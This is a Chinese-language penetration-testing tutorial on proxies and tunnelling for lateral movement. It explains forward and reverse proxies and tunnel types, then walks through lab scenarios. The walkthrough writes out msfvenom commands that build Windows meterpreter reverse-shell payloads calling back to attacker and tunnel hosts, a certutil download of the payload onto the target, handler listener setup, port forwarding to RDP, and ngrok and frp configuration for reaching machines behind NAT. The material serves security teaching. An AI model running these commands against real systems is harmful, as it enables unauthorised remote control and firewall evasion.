代理隧道知识

admin 2024年2月19日08:57:50评论8 views字数 2512阅读8分22秒阅读模式

Hello,好久不见哦!红蓝对抗过程中打点以后往往需要进行内网渗透和横向移动,因此大家都需要扎实掌握代理和隧道知识,一款优秀的代理工具也可以给内网渗透带来很大的收益。本期小智将通过简单易懂的方式向大家普及各种代理逻辑及隧道的原理。

前言介绍

01正向代理
代理客户端,帮助客户端完成所需请求。

举例:小智要向银行贷款,可是因为自己资历不够,所以不获银行放贷,小智个人无法贷到所需款项。此时,只要小智找一个满足资历的B先生去帮忙借贷,银行自然就会放贷。贷款到账后,B先生再私下把钱给到小智。从整个流程来看,对于银行(服务端)来说,款项是贷给B先生了,但实际上款项还是流向了小智(客户端),但银行(服务端)是不知道的。

02反向代理
代理服务端,帮服务端去完成所需请求。

举例:拨打电信客服电话,此时语音提选择所需的业务办理和进入人工服务。当您完成选择后,服务器会根据您请求的业务进行分配,空闲的人工服务人员帮助小星解决问题。此时,(客户端)并不知道服务端中处理请求的人是谁,只知道是电信的人员,这种现象与正向代理相反。

03内网穿透代理隧道技术说明

代理 : 解决的是网络不通的问题
隧道 : 解决的是流量分析工具 , 流量检测工具 , 和防火墙相关过滤问题

隧道知识

01概述&原理

在一般的网络通信中,两台机器之间先建立TCP连接,然后正常的进行数据通信。在实际的环境中,通常会通过各种边界设备、软/硬件防火墙甚至是IDS来检查对外连接情况,发现异常就会进行阻断。这个时候我们通过自己搭建隧道解决这类问题

这里所讲的隧道,是指一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙与对方通信。当被封装的数据包到达目的地后,将数据包还原,并将还原的数据包发到相应的服务器上。

02常见的隧道

网络层:IPv6隧道、ICMP隧道、GRE隧道。

传输层:TCP隧道、UDP隧道、常规端口转发。

应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道。
03代理场景

场景一:NAT映射的网站

使用端口转发技术 , 访问到真实主机的其他没有映射出来的端口 , 也就是内网那些端口

攻击者的机器

带有公网ip的vps

目标机器

只能访问80的http端口 , 是NAT映射出来的 , 不能链接3389端口 , 能出网

代理隧道知识

实验目标 : 通过端口转发 , 链接到目标机器的3389端口

kali 上的msf上线虚拟机win2012 , 链接3389

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.102 L
PORT=8001 -f exe -o /tmp/payload.exe

window12下载

certutil -urlcache -split -f http://192.168.6.102:8000/payload
.exe payload.exe

拿到meterpreter回话执行

# 添加端口portfwd ?portfwd add -l 5656 -p 3389 -r 192.168.6.140   ( 感觉并不好用 )

kali连接rdesktop 127.0.0.1:5656

原理:通过这个会话把访问kali的 5656 端口的流量转发到靶机的3389端口上,把靶机的3389端口的流量转发到kali的5555端口上。# 如果网络环境不好 , 会话非常容易断开链接

Win + r , 输入 mstsc , 192.168.0.157

代理隧道知识

在kali中连接

rdesktop 127.0.0.1:3389

代理隧道知识

可能会有网络波动 , 不是很稳定 , frp也可以实现端口转发的功能 , frp非常强大 , 这种内网端口转发到公网上 ,非常的简单。

场景二:双方都在内网

这种就是偏向于个人电脑对战个人电脑的场景

攻击者的机器

内网地址 , 但是能出网

目标机器

不同的内网地址 , 但是能出网

通过 Ngrok 进行内网穿透 , 需要购买一个内网穿透服务

代理隧道知识

代理隧道知识

记录隧道域名和隧道id

代理隧道知识

下载客户端 , 根据你的远控所在的系统下载 , 比如我的远控是msf , 系统是kali

代理隧道知识

解压客户端 , 然后再kali上运行

./sunny clientid 163836369558

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengy
e.com lport=10354 -f exe -o /tmp/test.exe
msf开启监听
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost 192.168.6.102set lport 8001exploit

免费的不稳定 , 很容易掉 , 实战推荐付费 , 这里记住原理就好了

通过 frp 进行内网穿透

需要一台vps , 然后再vps上执行frps

https://github.com/fatedier/frp/releases/tag/v0.44.0
# 启动服务端:./frps -c ./frps.ini

内网kali上修改配置文件 frpc.ini

[common]server_addr = 192.168.6.102server_port = 7000  [msf]type = tcplocal_ip = 127.0.0.1local_port = 8001remote_port = 10126
简单理解就是把公网 10126 的流量转发到本地 8001 上

kali上运行frpc

./frpc -c ./frpc.ini

生成msf木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=119.3.12.54
 lport=10126 -f exe -o /tmp/m.exe

监听

use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 127.0.0.1set LPORT 8001exploit

靶机运行m.exe , 上线成功

代理隧道知识

好了这期分享到此结束,咱们下次见!

免责声明:涉及到的所有技术仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透。否则产生的一切后果自行承担!

原文始发于微信公众号(智检安全):代理隧道知识

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月19日08:57:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   代理隧道知识http://cn-sec.com/archives/2201222.html

发表评论

匿名网友 填写信息